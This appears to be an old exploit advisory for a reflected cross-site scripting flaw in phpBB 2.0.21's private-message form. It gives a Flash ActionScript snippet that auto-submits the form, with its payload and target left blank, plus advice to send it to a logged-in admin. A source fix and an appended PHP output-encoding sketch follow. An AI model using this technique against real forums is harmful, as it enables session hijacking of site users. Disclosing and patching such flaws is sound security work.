
phpBB (privmsg.php) XSS Exploit


By: Demential
PhpBB website: 

Exploit tested on phpBB 2.0.21.

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = ""; 
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("", "_self", "POST"); 

Put it into a web page:

Put a title here

Put some text here

And send it to the admin (or a normal user). Users must be logged in.

Fixing:

open phpBB2/privmsg.php

find:

if (!($to_userdata = $db->sql_fetchrow($result)))
{
    $error = TRUE;
    $error_msg = $lang['No_such_user'];

replace with:

if (!($to_userdata = $db->sql_fetchrow($result)))
{
    $error = TRUE;
    echo "Sorry, but no such user exists.";
    exit;
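The fix above avoids the reflection by never re-rendering the compose form on the "no such user" path. The sketch below shows the other common remedy, HTML-encoding every submitted field at the point of output. It is an added example, not phpBB code and not the author's patch; the function names, form markup and sample request are hypothetical and constructed for illustration.

```php
<?php
// Added example: NOT phpBB code. The render functions and field names are
// hypothetical stand-ins for the "no such user" error path in privmsg.php.

// HTML-encode a value for element content or a quoted attribute.
// Non-string input (e.g. message[]=x arrays) is rendered as empty.
function h($value): string
{
    return is_string($value)
        ? htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        : '';
}

// Vulnerable pattern: submitted fields are echoed back verbatim.
function render_compose_form_unsafe(array $post, string $error_msg): string
{
    return '<p class="error">' . $error_msg . "</p>\n"
         . '<input name="username" value="' . ($post['username'] ?? '') . "\">\n"
         . '<textarea name="message">' . ($post['message'] ?? '') . "</textarea>\n";
}

// Hardened pattern: every reflected value is encoded where it is written out.
function render_compose_form_safe(array $post, string $error_msg): string
{
    return '<p class="error">' . h($error_msg) . "</p>\n"
         . '<input name="username" value="' . h($post['username'] ?? '') . "\">\n"
         . '<textarea name="message">' . h($post['message'] ?? '') . "</textarea>\n";
}

// Constructed sample request: recipient does not exist, body carries markup.
$post = [
    'username' => 'user_that_doesnt_exist',
    'message'  => '</textarea><script>alert(1)</script>',
];
$error = 'Sorry, but no such user exists.';

$unsafe = render_compose_form_unsafe($post, $error);
$safe   = render_compose_form_safe($post, $error);

// Report whether a literal <script> tag reached each rendered page.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') !== false);
echo $safe;
```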
